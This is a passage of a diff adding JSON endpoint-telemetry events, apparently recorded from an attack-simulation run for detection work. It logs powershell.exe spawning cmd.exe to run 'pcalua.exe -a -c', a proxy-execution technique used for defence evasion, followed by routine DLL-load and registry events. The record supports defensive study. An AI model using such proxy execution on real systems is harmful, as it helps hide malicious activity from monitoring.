"ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573971980000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573972140000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "event_type": "process", + "pid": 2828, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573972140000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010F9155701}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a -c\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7004, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573973190000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573973070000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573973070000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573973070000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573973070000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573973230000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "event_type": "registry", + "pid": 7004, + "process_name": "cmd.exe", + "process_path": "C:\\WINDOWS\\system32\\cmd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", + "registry_value": "pcalua.exe", + "timestamp": 131883573973230000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" + }, + { + "command_line": "pcalua.exe -a -c", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2036, + "ppid": 7004, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "subtype": "create", + "timestamp": 131883573973300000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}", + "unique_ppid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973390000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573973390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573973390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "pcalua.exe", + "image_path": "C:\\Windows\\System32\\pcalua.exe", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973390000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973540000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973700016, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "image_load", + "image_name": "comctl32.dll", + "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", + "pid": 2036, + "process_name": "pcalua.exe", + "process_path": "C:\\Windows\\System32\\pcalua.exe", + "timestamp": 131883573973860000, + "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573974020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 